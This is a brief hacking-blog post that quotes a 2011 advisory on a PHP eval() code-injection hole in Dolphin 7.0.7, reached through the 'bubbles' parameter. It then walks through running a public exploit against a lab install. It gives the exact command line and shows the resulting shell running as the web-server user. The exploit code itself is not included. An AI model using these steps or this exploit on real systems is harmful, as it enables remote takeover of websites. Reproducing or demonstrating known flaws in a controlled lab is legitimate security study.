Hacking Blog

Dolphin "eval()" PHP Code Execution Vulnerability

Secunia Advisory SA46457
Release Date 2011-10-19
URL http://secunia.com/advisories/46457/
Exploit URL : http://www.exploit-db.com/exploits/17994/
Description: A vulnerability has been discovered in Dolphin, which can be exploited by malicious users to compromise a vulnerable system. Input passed via the "bubbles" parameter to member_menu_queries.php (when "action" is set to "get_bubbles_values") is not properly sanitised before being used in an "eval()" call. This can be exploited to execute arbitrary PHP code.

The vulnerability is confirmed in version 7.0.7. Other versions may also be affected.

----

Hi everyone, so, this is just a quick post to show dolphin 7.0.7 exploit. This is how you test it :
1) Download the application from http://www.4shared.com/file/HTsuoYry/Dolphin-v707.html
2) Install it
3) Download the exploit
4) Run the exploit in the format : php dolphin707.php 172.16.1.70 /dolphin/ user pass
Remember to change the ip to match yours.
5) You got your shell

This is what looks like
root@bt:~/exploits# php dolphin707.php 172.16.1.70 /dolphin/ admin hacktest

+------------------------------------------------------------+
| Dolphin <= 7.0.7 Remote PHP Code Injection Exploit by EgiX |
+------------------------------------------------------------+

dolphin-shell# id
uid=48(apache) gid=48(apache) groups=48(apache)



Thanks for whatching.